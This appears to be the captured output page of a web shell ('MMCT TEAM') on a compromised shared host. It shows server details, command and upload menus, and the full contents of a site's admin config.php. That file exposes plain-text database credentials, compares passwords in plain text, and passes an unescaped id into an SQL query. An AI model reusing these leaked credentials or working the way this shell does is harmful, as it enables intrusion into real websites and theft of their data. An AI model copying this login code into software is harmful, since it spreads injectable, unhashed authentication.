MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.145.33.230
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/ppcad7no/activesports.co.in/../comfortaircon.co/../rajwadahouse.com/admin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/activesports.co.in/../comfortaircon.co/../rajwadahouse.com/admin/config.php
<?php 
    session_start();
    
    // $db = mysqli_connect('localhost', 'root', 'password', 'db-name');
    $db = mysqli_connect('localhost', 'ppcad7no_rajwada', 'y^xQ^%654GHhhh%^', 'ppcad7no_rajwada');
    // variable declaration
    $username = "";
    $email    = "";
    $errors   = array();
    
    if (isset($_POST['login_btn'])) {
    	login();
    }
    
    // LOGIN USER
    function login(){
    	global $db, $username, $errors;
    
    	// grap form values
    	$username = e($_POST['username']);
    	$password = e($_POST['password']);
    
    	// make sure form is filled properly
    	if (empty($username)) {
    		array_push($errors, "Username is required");
    	}
    	if (empty($password)) {
    		array_push($errors, "Password is required");
    	}
    
    	// attempt login if no errors on form
    	if (count($errors) == 0) {
    		// $password = md5($password);
    
    		// Query for login_tbl
    		$query1 = "SELECT * FROM login_tbl WHERE username='$username' AND password='$password' AND admin_status='Active' LIMIT 1";
    		$results1 = mysqli_query($db, $query1);
    
    		if (mysqli_num_rows($results1) == 1) {
        // check if user is admin or user
        $logged_in_user = mysqli_fetch_assoc($results1);
        if ($logged_in_user['user_type'] == 'supadmin') {
            $_SESSION['user'] = $logged_in_user;
            $_SESSION['success']  = "";
            header('location: index.php');		  
        } else if ($logged_in_user['user_type'] == 'admin') {
            $_SESSION['user'] = $logged_in_user;
            $_SESSION['success']  = "";
            header('location: index.php');		  
        } else if ($logged_in_user['user_type'] == 'user') {
            $_SESSION['user'] = $logged_in_user;
            $_SESSION['success']  = "";
            header('location: index.php');
        } else {
            $_SESSION['msg'] = "Invalid user type";
            header('location: login.php');
        }
    } else {
        $_SESSION['msg'] = "Invalid username or password";
        header('location: login.php');
    }
    
    		$query2 = "SELECT * FROM tbl_member WHERE username='$username' AND password='$password' LIMIT 1";
    		$results2 = mysqli_query($db, $query2);
    
    		if (mysqli_num_rows($results2) == 1) { 
    			$logged_in_user = mysqli_fetch_assoc($results2);
    			$_SESSION['user'] = $logged_in_user;
    			$_SESSION['success']  = "";
    			header('location:member_home.php');
    		}
    
    		// No user found in either table
    		array_push($errors, "Wrong username/password ");
    	}
    }
    
    
    
    
    function isAdmin()
    {
    	if (isset($_SESSION['user']) && $_SESSION['user']['user_type'] == 'admin' ) {
    		return true;
    	}else{
    		return false;
    	}
    }
    
    // return user array from their id
    function getUserById($id){
    	global $db;
    	$query = "SELECT * FROM login_tbl WHERE id= $id";
    	$result = mysqli_query($db, $query);
    
    	$user = mysqli_fetch_assoc($result);
    	return $user;
    }
    
    // escape string
    function e($val){
    	global $db;
    	return mysqli_real_escape_string($db, trim($val));
    }
    
    function display_error() {
    	global $errors;
    
    	if (count($errors) > 0){
    		echo '<div class="error">';
    			foreach ($errors as $error){
    				echo $error .'<br>';
    			}
    		echo '</div>';
    	}
    }
    
    function isLoggedIn()
    {
    	if (isset($_SESSION['user'])) {
    		return true;
    	}else{
    		return false;
    	}
    }
    
    if (isset($_GET['logout'])) {
    	session_destroy();
    	unset($_SESSION['user']);
    	header("location: login.php");
    }
    
    function my_prepared($sql) {
        global $db;
        $stmt = mysqli_prepare($db, $sql);
        if (!$stmt) {
            die("Prepared statement error: " . mysqli_error($db));
        }
        return $stmt;
    }
?>

MMCT - 2023